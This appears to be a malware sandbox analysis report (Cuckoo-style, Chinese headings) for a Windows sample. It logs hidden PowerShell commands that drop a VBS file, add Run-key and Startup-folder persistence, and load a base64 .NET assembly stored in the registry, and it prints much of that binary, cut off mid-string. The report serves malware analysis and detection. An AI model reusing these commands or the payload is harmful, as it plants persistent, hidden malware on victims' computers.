cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
cmdline powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
cmdline powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
cmdline powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
A process created a hidden window (8 个事件)
Time & API Arguments Status Return Repeated
1619832774.921249
CreateProcessInternalW
thread_identifier: 2452
thread_handle: 0x000002c0
process_identifier: 2984
current_directory: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000308
inherit_handles: 0
success 1 0
1619832774.921249
ShellExecuteExW
parameters: -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
filepath: powershell
filepath_r: powershell
show_type: 0
success 1 0
1619832785.312124
CreateProcessInternalW
thread_identifier: 1824
thread_handle: 0x000002c0
process_identifier: 1272
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000308
inherit_handles: 0
success 1 0
1619832785.328124
ShellExecuteExW
parameters: -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
filepath: powershell
filepath_r: powershell
show_type: 0
success 1 0
1619832785.531124
CreateProcessInternalW
thread_identifier: 2040
thread_handle: 0x000002b0
process_identifier: 2008
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x000002c0
inherit_handles: 0
success 1 0
1619832785.531124
ShellExecuteExW
parameters: -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
filepath: powershell
filepath_r: powershell
show_type: 0
success 1 0
1619832785.890124
CreateProcessInternalW
thread_identifier: 2900
thread_handle: 0x000001b8
process_identifier: 1176
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x000002c0
inherit_handles: 0
success 1 0
1619832785.906124
ShellExecuteExW
parameters: -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
filepath: powershell
filepath_r: powershell
show_type: 0
success 1 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 个事件)
Time & API Arguments Status Return Repeated
1619832779.781626
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619832792.437249
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619832792.124249
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619832794.156876
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
网络通信
Communicates with host for which no DNS query was performed (3 个事件)
host 172.217.24.14
host 193.56.28.101
host 91.193.75.158
Installs itself for autorun at Windows startup (2 个事件)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\microsoft reg_value C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config (2 个事件)
Time & API Arguments Status Return Repeated
1619832785.562124
RegSetValueExA
key_handle: 0x00000310
value: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM@hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ@KJAAAAAAAAABQRQAATAECAPfDAl8AAAAAAAAAAOAAAgELAQgAAD4AAAACAAAAAAAA7l@AAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJxdAABPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC5@ZXh@AAAA9D@AAAAgAAAAPgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAAAAAIAAABAAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQXQAAAAAAAEgAAAACAAUA2D@AAMQfAAABAAAABwAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAc5yAQAAcIAPAAAEKAgAAAqAEAAABHMGAAAGgBEAAARzCQAACoASAAAEchMAAHCAEwAABCoAAzAFAMMAAAAAAAAAAigFAAAKAAIWfQEAAAQCFH@CAAAEAhZ9AwAABAIC/gYPAAAGcwoAAAoXcwsAAAp9BAAABAIC/gYKAAAGcwoAAApzDAAACn@FAAAEAgL+BgkAAAZzCgAACnMMAAAKfQYAAAQCF3@HAAAEAhZ9CAAABAJyLQAAcHJnAABwFRYoDQAACn@JAAAEAnJrAABwcmcAAHAVFigNAAAKfQoAAAQCcoEAAHB9CwAABAJyiwAAcH@MAAAEAhZ9DQAABAIWfQ4AAAQqABMwBAAQAAAAAQAAEQAAAAB+EQAABG8IAAAGACraAAJ7BAAABBRyqwAAcBaNCAAAARQUFBcoDwAACiYCewUAAARvEAAACgACewYAAARvEAAACgAqABswCACIAAAAAgAAEQAAAAAXAnsMAAAEAnwBAAAEcxEAAAqAFAAABAJ7AQAABBb+AQsHLDAoEgAACgB+FwAABCwHfhcAAAQrFn4VAAAE/gYoAAAGcxMAAAolgBcAAAQoFAAACgDeDSgVAAAKACgWAAAK3gAAILiIAAAoFwAACgB+GAAACgoAAAAAAAAAAAAAAAAAACoBEAAAAAADAFdaAA@YAAABEzADACcAAAADAAARAAACewcAAAQW/gEKBiwOAnwIAAAEJQsHShfWVAAAFygXAAAKACvaABswDAAsBwAABAAAEQACAyggAAAGfhMAAAQVFigNAAAKCgYWmnK3AABwFigZAAAKFv4BCwcsGQIWfQcAAAQCcrcAAHAoEgAABgAAOOgGAAAGFppyvwAAcBYoGQAAChb+AQwILFECF3@HAAAEAnK/AABwfhMAAAQCewgAAAQoGgAACigbAAAKKBIAAAYAAhZ9CAAABAJywwAAcH4TAAAEAigeAAAGKBsAAAooEgAABgAAOIIGAAAGFppyxwAAcBYoGQAAChb+AQ@JOZUBAAB+HAAACnLNAABwAgJ7DAAABCgjAAAGKB@AAApy4QAAcCgdAAAKBheaKB@AAAooHgAAChdvHwAAChT+AxMEEQQ5AgEAAAACAnsJAAAEAnsNAAAEmgJ7CgAABAJ7DgAABJoGGpoGG5oCAgJ7CwAABCgkAAAGcuUAAHAoHQAACgIoGQAABigdAAAKKB4AAAooIwAABigeAAAKcukAAHACAnsMAAAEKCMAAAYoHQAACnLhAABwKB@AAAoGF5ooHQAACigeAAAKBheaFCggAAAKbyEAAAoGGJooIgAACgYZmigjAAAKBheaFygMAAAGJt5UKBUAAAoAAh2NGQAAASUWciEBAHCiJRd+EwAABKIlGAYbmqIlGX4TAAAEoiUaBheaoiUbfhMAAASiJRwWKCQAAAqiKCUAAAooEgAABgAoFgAACt4AAAArSQACHY@ZAAABJRZyIQEAcKIlF34TAAAEoiUYBhuaoiUZfhMAAASiJRoGF5qiJRt+EwAABKIlHBYoJAAACqIoJQAACigSAAAGAAAAONUEAAAGFppyKQEAcBYoGQAAChb+ARMFEQUsfAICewkAAAQCew@AAASaAnsKAAAEAnsOAAAEmgYXmgYYmgICAnsLAAAEKCQAAAZy5QAAcCgdAAAKAigZAAAGKB@AAAooHgAACigjAAAGKB4AAAoGGZoGGpooIgAACgYbmigjAAAKBhyaBh2aKCMAAAooDAAABiYAOEIEAAAGFppyLwEAcBYoGQAAChb+ARMGEQY5KAQAAAIGF5ooDQAABhRyNwEAcBeNCAAAASUWBhiPGQAAASUTFFCiJRMVFBQXjR4AAAElFhecJRMWKCYAAAoTFxEWFpEtAisgERQRFRaaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVERFxRyVQEAcB8rjQgAAAElFgICewwAAAQoIwAABqIlFwYZjxkAAAElEwdQoiUYcl@BAHCiJRlyXQEAcKIlGnJdAQBwoiUbcl@BAHCiJRxyXQEAcKIlHXJdAQBwoiUecl@BAHCiJR8Jcl@BAHCiJR8Kcl@BAHCiJR8Lcl@BAHCiJR8Mcl@BAHCiJR8Ncl@BAHCiJR8Ocl@BAHCiJR8Pcl@BAHCiJR8Qcl@BAHCiJR8Rcl@BAHCiJR8Scl@BAHCiJR8Tcl@BAHCiJR8Ucl@BAHCiJR8Vcl@BAHCiJR8Wcl@BAHCiJR8Xcl@BAHCiJR8Ycl@BAHCiJR8Zcl@BAHCiJR8acl@BAHCiJR8gBhqPGQAAASUTCFCiJR8hBhuPGQAAASUTCVCiJR8ifhAAAASiJR8jBhyPGQAAASUTClCiJR8kBh2PGQAAASUTC1CiJR8lBh6PGQAAASUTDFCiJR8mBh8JjxkAAAElEw1QoiUfJwYfCo8ZAAABJRMOUKIlHygGHwuPGQAAASUTD1CiJR8pBh8MjxkAAAElExBQoiUfKgYfDY8ZAAABJRMRUKIlExIUFB8rjR4AAAEl@BkAAAQoKgAACiUTExcoDwAACiYRExeRLQIrIBEHERIXmignAAAK@BkAAAEoKAAACigpAAAKdBkAAAFRERMfIJEtAishEQgREh8gmignAAAK@BkAAAEoKAAACigpAAAKdBkAAAFRERMfIZEtAishEQkREh8hmignAAAK@BkAAAEoKAAACigpAAAKdBkAAAFRERMfIpEtAisjERIfIpooJwAACtAZAAABKCgAAAooKQAACnQZAAABgBAAAAQREx8jkS@CKyERChESHyOaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8kkS@CKyERCxESHySaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8lkS@CKyERDBESHyWaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8mkS@CKyERDRESHyaaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8nkS@CKyERDhESHyeaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8okS@CKyERDxESHyiaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8pkS@CKyEREBESHymaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8qkS@CKyERERESHyqaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEAKgEQAAAAAAUBqq8BVBgAAAEbMAkARgIAAAUAABEAAg4GKA@AAAYUcjcBAHAYjQgAAAElFgVyXwEAcA4EKBsAAAqiJRcXjB4AAAGiFBQUKCYAAAoUcqsAAHAcjQgAAAElFg4FoiUXDgeMIwAAAaIlGAOiJRkEoiUafhMAAASiJRt+DwAABKIlCxQUHI@eAAABJdAYAAAEKCoAAAolDBcoDwAACiYIFpEtAiseBxaaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAARAFCBeRLQIrHgcXmignAAAK@CMAAAEoKAAACigpAAAKpSMAAAEQBwgYkS@CKx4HGJooJwAACtAZAAABKCgAAAooKQAACnQZAAABEAEIGZEtAiseBxmaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAARACCBqRLQIrIQcamignAAAK@BkAAAEoKAAACigpAAAKdBkAAAGAEwAABAgbkS@CKyEHG5ooJwAACtAZAAABKCgAAAooKQAACnQZAAABgA8AAAQOCA@JOc8AAAAAfhwAAApyzQAAcAICewwAAAQoIwAABigdAAAKcuEAAHAoHQAACg4JKB@AAAooHgAAChdvHwAAChT+ARMEEQQsOAJy6QAAcAICewwAAAQoIwAABigdAAAKcuEAAHAoHQAACg4JKB@AAAooHgAACg4JDgYoDgAABiYAAN4NKBUAAAoAKBYAAAreAAAOChb+ARMFEQUsOAJy6QAAcAICewwAAAQoIwAABigdAAAKcuEAAHAoHQAACg4JKB@AAAooHgAACg4JDgYoDgAABiYAAAAABioAAAEQAAAAAHQBfPABDRgAAAETMAIAFwAAAAYAABEAAgMoKwAACigiAAAGKCwAAAoKKwAGKgAbMAMAHQAAAAYAABEAAAMEBSgtAAAKAN4NKBUAAAoAKBYAAAreAAAGKgAAAAEQAAAAAAEADA@ADRgAAAEbMA@AHggAAAcAABEAcy4AAAoKFgsAAAAoLwAACm8wAAAKKDEAAAooGAAABibeDSgVAAAKACgWAAAK3gAA3g@oFQAACgAoFgAACt4AAAACewIAAAQU/gENCSwF3QwEAAACewIAAAQUcmMBAHAWjQgAAAEUFBQoJgAAChRycQEAcBaNCAAAARQUFCgmAAAKFoweAAABFigyAAAKEwQRBCwF3ccDAAACewMAAAQW/gETBREFLAXdswMAAAcX1gsHIJYAAAD+AhMGEQY5kgAAABYLAnsCAAAEFHJjAQBwFo@IAAABFBQUKCYAAAoUcoUBAHAYjQgAAAElFhWMIwAAAaIlFxaMKQAAAaIUFBQoJgAACgJ7AgAABBRyYwEAcBaNCAAAARQUFCgmAAAKFHKPAQBwFo@IAAABFBQUKCYAAAoWjCMAAAEWKDMAAAooNAAACig1AAAKEwcRBywF3Q@DAAAAAAJ7AgAABBRyjwEAcBaNCAAAARQUFCgmAAAKFowjAAABFig2AAAKEwgRCDm/AgAAAnsCAAAEFHKPAQBwFo@IAAABFBQUKCYAAAoXjCMAAAEoNwAACig4AAAKF9aNKgAAARMJAnsCAAAEFHJjAQBwFo@IAAABFBQUKCYAAAoUcqMBAHAajQgAAAElFhEJoiUXFowjAAABoiUYEQmOaYwjAAABoiUZFowrAAABoiUTChQUGo@eAAABJRYXnCUTCxcoDwAACiYRCxaRLQIrHxEKFpooJwAACtABAAAbKCgAAAooKQAACnQBAAAbEwkGFHKzAQBwGY@IAAABJRYRCaIlFxaMIwAAAaIlGBEJjmmMIwAAAaIlEwoUFBmNHgAAASUWF5wlEwsXKA8AAAomEQsWkS@CKx8RChaaKCcAAArQAQAAGygoAAAKKCkAAAp@AQAAGxMJAAIGFHK/AQBwFo@IAAABFBQUKCYAAAp@AQAAGyggAAAGfg8AAARvOQAAChMMEQw5ZgEAAAIGFHK/AQBwFo@IAAABFBQUKCYAAAp@AQAAG34PAAAEKCEAAAYTDQL+BiUAAAZzOgAACnM7AAAKEw4RDhENF4@IAAABJRYWjCMAAAGiFCg8AAAKKCcAAApvPQAACgAGFHLPAQBwFo@IAAABFBQUFygPAAAKJnMuAAAKChENbz4AAAoY/gETDxEPOdYAAAAGFHKzAQBwGY@IAAABJRYRDRMQERAXjQgAAAElFheMIwAAASUTEaIUKDwAAAqiJRcWjCMAAAGiJRgRDReNCAAAASUWF4wjAAABohQoPAAACiUTEhRy3wEAcBaNCAAAARQUFCgmAAAKoiUTChQUGY@eAAABJRYXnCUYF5wlEwsXKA8AAAomEQsWkS@CKx@REBiNCAAAASUWERGiJRcRChaaohQXFig/AAAKABELGJEtAisfERIUct8BAHAXjQgAAAElFhEKGJqiFBQXFyhAAAAKADho/v//AAAAAADeDSgVAAAKACgWAAAK3g@AFygXAAAKADip+///AAAAKC8AAApvMAAACigxAAAKKBgAAAYm3g@oFQAACgAoFgAACt4AAN4NKBUAAAoAKBYAAAreAAACFn@DAAAEAAJ7AgAABBRyYwEAcBaNCAAAARQUFCgmAAAKFHLtAQBwF4@IAAABJRYWjB4AAAGiFBQUFygPAAAKJt4NKBUAAAoAKBYAAAreAAAABhRyzwEAcBaNCAAAARQUFBcoDwAACibeDSgVAAAKACgWAAAK3gAAcy4AAAoKFgwCewkAAASOaRjaExMWExQ41AIAAAAAAnNBAAAKJRVvQgAACgAlFW9DAAAKACUgP@IPAG9EAAAKACUgP@IPAG9FAAAKAH@CAAAEFgsCKBAAAAYUcgMCAHAYjQgAAAElFgJ7CQAABBEUjxkAAAElExVQoiUXAnsKAAAEERSPGQAAASUTFlCiJRMKFBQYjR4AAAElFhecJRcXnCUTCxcoDwAACiYRCxaRLQIrIBEVEQoWmignAAAK@BkAAAEoKAAACigpAAAKdBkAAAFREQsXkS@CKyARFhEKF5ooJwAACtAZAAABKCgAAAooKQAACnQZAAABUQIXfQMAAAQCFHITAgBwF4@IAAABJRZyHQIAcH4TAAAEAnsLAAAEfhMAAAQoRgAACgJy5QAAcAIoGQAABihHAAAKKCMAAAYoHQAACn4TAAAEKB@AAAoCKBMAAAYoHQAACn4TAAAEKB@AAAoCKEgAAApyNQIAcChJAAAKKBsAAAooIwAABigdAAAKfhMAAAQoHQAACgIoGgAABigdAAAKfhMAAAQoHQAACgJ+EgAABG9KAAAKcj@CAHAoGwAABigbAAAKKCMAAAYoHQAACn4TAAAEKB@AAAoCAigdAAAGKB4AAAooIwAABigdAAAKfhMAAAQoHQAACn4SAAAEb@sAAAqMLwAAASgdAAAKfhMAAAQoHQAACgJyQQIAcCgcAAAGKB@AAAp+EwAABCgdAAAKAnJ/AgBwKBwAAAYoHQAACn4TAAAEKB@AAAoCewoAAAQCew4AAASaKB@AAAp+EwAABCgdAAAKAigeAAAGKB@AAAp+EwAABCgdAAAKAihMAAAKb@@AAAooIwAABigdAAAKfhMAAAQoHQAACnK7AgBwKB@AAAqiFBQUFygPAAAKJgIRFH@NAAAEAhEUfQ4AAAQXDN@6+P//KBUAAAoAcscCAHAoIgAACigXAAAKAAIWfQ@AAAQCFn@OAAAEKBYAAAreAAARFBfWExQRFBETPiP9//8IExcRFywHFgw4SPz//wA46/f//wAAQcQAAAAAAAALAAAAGAAAACMAAAANAAAAGAAAAQAAAAAKAAAAKQAAADMAAAANAAAAGAAAAQAAAABBAAAABQQAAEYEAAANAAAAGAAAAQAAAABiBAAAGAAAAHoEAAANAAAAGAAAAQAAAABhBAAAKQAAAIoEAAANAAAAGAAAAQAAAACfBAAAPAAAANsEAAANAAAAGAAAAQAAAADpBAAAGgAAAAMFAAANAAAAGAAAAQAAAAAuBQAAoQIAAM8HAAArAAAAGAAAARMwBwAgAAAABgAAEQACewIAAAQUcmMBAHAWjQgAAAEUFBQoJgAACgorAAYqGzANAD@CAAAIAAARAAJ7AwAABBb+AQoGLAU4KQIAAAAAcy4AAAoLBxRyswEAcBmNCAAAASUWA6IlFxaMIwAAAaIlGAOOaYwjAAABoiUMFBQZjR4AAAElFhecJQ@XKA8AAAomCRaRLQIrHggWmignAAAK@AEAABsoKAAACigpAAAKdAEAABsQAQcUcrMBAHAZjQgAAAElFgJ+DwAABCgfAAAGoiUXFowjAAABoiUYfg8AAARvTgAACowjAAABohQUFBcoDwAACiYCewIAAAQUcmMBAHAWjQgAAAEUFBQoJgAAChRy@QIAcBeNCAAAASUWA45pjCMAAAGiFBQWFyhAAAAKAAJ7AgAABBRyYwEAcBaNCAAAARQUFCgmAAAKFHKFAQBwGI@IAAABJRYVjCMAAAGiJRcXjCkAAAGiFBQUFygPAAAKJgJ7AgAABBRyYwEAcBaNCAAAARQUFCgmAAAKFHITAgBwGo@IAAABJRYHEwQRBBRyvwEAcBaNCAAAARQUFCgmAAAKoiUXFowjAAABoiUYBxMFEQUUcu8CAHAWjQgAAAEUFBQoJgAACqIlGRaMKwAAAaIlDBQUGo@eAAABJRYXnCUYF5wlDRcoDwAACiYJFpEtAiseEQQUcr8BAHAXjQgAAAElFggWmqIUFBcWKEAAAAoACRiRLQIrHhEFFHLvAgBwF4@IAAABJRYIGJqiFBQXFihAAAAKAAcUcs8BAHAWjQgAAAEUFBQXKA8AAAom3hQoFQAACgACFn@DAAAEKBYAAAreAAAqAAAAQRwAAAAAAAAUAAAAEwIAACcCAAAUAAAAGAAAAUIAAgIDKB8AAAYoEQAABgAqAAAAGzACADkAAAAGAAARAAAoTwAACihQAAAKb1EAAAoWb1IAAAp@MwAAAW9TAAAKCt4TKBUAAAoAcv@CAHAKKBYAAAreAAYqAAAAARAAAAAAAQAjJAATGAAAARswCABUAAAACQAAEQAAcgcDAHAoVAAACnLhAABwKEcAAAoMEgIUDRIDFhIBFhMEEgQWEwUSBRQTBhIGFigUAAAGJgcoVQAACgreEygVAAAKAHIfAwBwCigWAAAK3gAGKgEQAAAAAAEAPj8AExgAAAEbMAUATQAAAAoAABEAABYLB7UfZChWAAAKDRIDH2QUEwQSBB9kKBcAAAYMCCwIcicDAHAK3iEABxfWCwcaMdHeDSgVAAAKACgWAAAK3gAAci8DAHAKKwAGKgAAAAEQAAAAAAEANDUADRgAAAEbMAIAcQAAAAsAABEAAHI1AwBwc1cAAAooWAAACm9ZAAAKCyspB29aAAAKdDkAAAEMCHJxAwBwb1sAAAooJwAACihcAAAKKBoAAAoK3i@Hb1@AAAoNCS3N3gsHLAcHb14AAAoA3N4TKBUAAAoAcv@CAHAKKBYAAAreAQAGKgAAAAEcAAACAAIATE4ACwAAAAAAAAEAWlsAExgAAAEbMAQA4gAAAAwAABEAAH4YAAAKC3KLAwBwfhIAAARvSgAACnKzAwBwbzkAAApyXQEAcHK5AwBwKF8AAApvIQAACihHAAAKA3NgAAAKKFgAAApvWQAACgwrJAhvWgAACnQ5AAABDQcJcr@DAHBvWwAACm8hAAAKKEcAAAoLAAhvXQAAChMEEQQt@N4LCCwHCG9eAAAKANwHfhgAAAoWKBkAAAoW/gMTBREFLA8CBygjAAAGKB4AAAoK3jIAAnLVAwBwKCMAAAYoHgAACgreHigVAAAKAAJy1QMAcCgjAAAGKB4AAAoKKBYAAAreAAYqAAABHAAAAgAIAHd/AAsAAAAAAAABAMHCAB4YAAABGzADAC8AAAAGAAARAABy3QMAcHJiBABwFCggAAAKbyEAAAoK3hMoFQAACgBy/QIAcAooFgAACt4ABioAARAAAAAAAQAZGgATGAAAARMwAwA@AAAADQAAEQAgAAEAAHNhAAAKCygVAAAGBwdvYgAACigWAAAGJgIHb2MAAAooIwAABigeAAAKCisABioTMAIAEQAAAA4AABEAKGQAAAoDb2UAAAoKKwAGKgAAABMwAgARAAAADwAAEQAoZAAACgNvZgAACgorAAYqAAAAEzAGAJUAAAAQAAARAHNnAAAKC3MuAAAKDHMuAAAKDQIDKCAAAAYEFRYoDQAAChMECAMWEQQWmm9OAAAKb2gAAAoACQMRBBaab@4AAAoEb@4AAArWA45pEQQWmm9OAAAKBG9OAAAK1tpvaAAACgAHCG9pAAAKb2oAAAoABwlvaQAACm9qAAAKAAhvawAACgAJb2sAAAoAB29sAAAKCisABioAAAATMAQAgQAAABEAABEAcy4AAAoLBwMWA45pb2gAAAoABxZqb2@AAAoABxYXc24AAAoMcy4AAAoNH@CNKgAAARMEFRMFCBEEFhEEjmlvbwAAChMFKxwJEQQWEQVvaAAACgAIEQQWEQSOaW9vAAAKEwUAEQUW/gITBhEGLdkIb3AAAAoACW9pAAAKCisABioAAAATMAIAFgAAAAYAABEAKHEAAAoDb2UAAAoocgAACgorAAYqAAATMAIAFgAAAAYAABEAKHEAAAoDKCsAAApvZgAACgorAAYqNgIDdAEAABsoCwAABioeAigFAAAKKi5zJgAABoAVAAAEKqp+FgAABCwHfhYAAAQrFn4VAAAE/gYpAAAGcwEAAAYlgBYAAARvBAAABio6AAB+FAAABG8HAAAKACoAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAFQKAAAjfgAAwAoAAFwMAAAjU3RyaW5ncwAAAAAcFwAAjAQAACNVUwCoGwAAEAAAACNHVUlEAAAAuBsAAAwEAAAjQmxvYgAAAAAAAAACAAABV7UCPAkCAAAA+gEzABYAAAEAAABCAAAABwAAABkAAAApAAAAMgAAAHIAAAAKAAAABQAAAAIAAAARAAAABgAAAAIAAAAFAAAAAgAAAAEAAAAFAAAAAwAAAAAAtggBAAAAAAAGACoACgAGAFAACgAGAHUAbgAGAIcACgAGALUAogAGAM4AbgAGANsAbgAGAOkAbgAGAPAAbgAGAP@AbgAGAAcBogAGAD